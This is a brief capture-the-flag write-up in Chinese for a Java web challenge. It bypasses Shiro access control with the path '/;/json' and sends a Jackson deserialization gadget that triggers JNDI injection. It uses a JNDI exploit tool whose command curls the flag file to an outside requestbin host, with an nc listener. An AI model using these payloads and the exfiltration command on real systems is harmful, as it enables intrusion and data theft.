JavaWeb

提供两条路由分别是/login和/json
其中/login可以用rememberMe检测到存在Shiro反序列化，/json需要有权限访问，通过Shiro框架的/;/json绕过，通过POST空对象[]判断存在jackson。
利用反序列化发起请求
["ch.qos.logback.core.db.JNDIConnectionSource", {"jndiLocation": "rmi://xxx:1099/aaaaaa"}]
远程监听收到报文
nc -lvnp 1099
使用JNDI注入工具：
GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入测试工具（A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc）
GitHub
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://http.requestbin.buuoj.cn/1d8sev11 -F [email protected]/flag'
提交请求
["ch.qos.logback.core.db.JNDIConnectionSource", {"jndiLocation": "rmi://xxx:1099/qmblyn"}]
拿到flag
​
​
​
Last modified 7mo ago